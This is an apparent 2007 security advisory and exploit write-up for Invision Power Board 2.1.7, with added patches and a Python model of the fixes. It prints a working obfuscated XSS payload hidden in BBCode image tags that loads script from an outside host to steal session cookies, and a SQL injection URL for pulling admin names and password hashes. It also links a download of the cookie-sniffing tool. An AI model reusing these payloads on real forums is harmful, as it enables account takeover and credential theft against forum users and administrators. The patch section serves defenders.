INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT
----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]
INVISION POWER BOARD 2.1.7
ACTIVE XSS/SQL INJECTION
Eugene Minaev
underwater@xxxxxxxxxxxx
-[ ITDEFENCE.ru Security advisory ]- 2007
----[ NITRO ... ]
This vulnerability was already found before, but there was no public working ("fighting") exploit for it. This POC consists of several parts: an active XSS generator, a JS file that is loaded when the page carrying the XSS is visited, a log viewer, and a special component that pulls the necessary data from the forum's MySQL tables if the intercepted session belonged to a user with moderator privileges.
----[ ANALYSIS ... ]
XSS.php is one of the most important parts of the IPB 2.1.7 POC package, as it generates the XSS for later injection into the forum board. As the reference you must specify the full path to the ya.js file (in which you have already corrected the path yourself beforehand). Most likely all that is needed is to press the button.
[img]http://www.ya.ru/[snapback]
onerror=script=document.createElement(String.fromCharCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
style=visibility:hidden =[/snapback].gif[/img]
The injection can only be executed when a session of a user with access to the moderator panel is available. To fix it, the "starter" parameter must be cast to an integer with the intval() function. In the case of a successful injection it is possible to enumerate the forum's administrator team:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
----[ RECORD ... ]
{
---IP ADDRESS   sniffed IP address
---REFERER      XSSed topic
---COOKIES      XSSed cookies of the forum member
---USER ID      XSSed user id of the forum member
---ADMIN NAME   admin username
---ADMIN PASS   admin password hash
---ADMIN SALT   admin hash salt
}
----[ PATCH ... ]
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
regex_check_image
LINE
924
REPLACE
if ( preg_match( "/[?&;]/", $url) )
WITH
if ( preg_match( "/[?&;\<\[]/", $url) )
FILE
sources/classes/bbcode/class_bbcode_core.php
FUNCTION
post_db_parse_bbcode
LINE
486
REPLACE
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
WITH
preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
// inside the existing loop over the matches, where $i is the match index:
// force the body of a [snapback] tag to a bare integer post id
if ( $row['bbcode_tag'] == 'snapback' )
{
    $match[2][$i] = intval( $match[2][$i] );
}
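Added example (not part of the advisory and not IPB's own code): a Python model of the two patched checks, showing that the stricter regex_check_image filter rejects an [img] URL that embeds another BBCode tag, and that intval() reduces a [snapback] body or a "starter" parameter to a bare number. The function names, the sample URLs and the parameter value are constructed here for illustration.

```python
import re

# Character filters from regex_check_image() in
# sources/classes/bbcode/class_bbcode_core.php: the unpatched class and the
# patched one from the advisory, which additionally rejects '<' and '['.
UNPATCHED_BAD_CHARS = re.compile(r"[?&;]")
PATCHED_BAD_CHARS = re.compile(r"[?&;<\[]")

# The [snapback] match from post_db_parse_bbcode(), translated to Python.
SNAPBACK_RX = re.compile(
    r"(\[snapback\])((?!\[/snapback\]).+?)?(\[/snapback\])", re.S | re.I
)


def image_url_allowed(url: str, patched: bool = True) -> bool:
    """True if the [img] URL passes the regex_check_image character filter."""
    rx = PATCHED_BAD_CHARS if patched else UNPATCHED_BAD_CHARS
    return rx.search(url) is None


def intval(value: str) -> int:
    """Python stand-in for PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*([+-]?\d+)", value)
    return int(m.group(1)) if m else 0


def snapback_bodies(text: str, patched: bool = True) -> list:
    """Return the body of every [snapback] tag found in text.

    With patched=True the body is coerced with intval(), as the advisory's
    second patch does, so only a post id survives into the generated markup.
    """
    bodies = []
    for m in SNAPBACK_RX.finditer(text):
        body = m.group(2) or ""
        bodies.append(str(intval(body)) if patched else body)
    return bodies


# Constructed inputs (not taken from the advisory).
CLEAN_URL = "http://example.com/pic.gif"
NESTED_TAG_URL = "http://example.com/[snapback]123 extra-text[/snapback].gif"
STARTER_PARAM = "1 union select 1/*"

if __name__ == "__main__":
    print(image_url_allowed(CLEAN_URL))                      # True
    print(image_url_allowed(NESTED_TAG_URL, patched=False))  # True: old filter lets it through
    print(image_url_allowed(NESTED_TAG_URL))                 # False: '[' is now rejected
    print(snapback_bodies(NESTED_TAG_URL, patched=False))    # ['123 extra-text']
    print(snapback_bodies(NESTED_TAG_URL))                   # ['123']
    print(intval(STARTER_PARAM))                             # 1
```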
www.underwater.itdefence.ru/isniff.rar
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]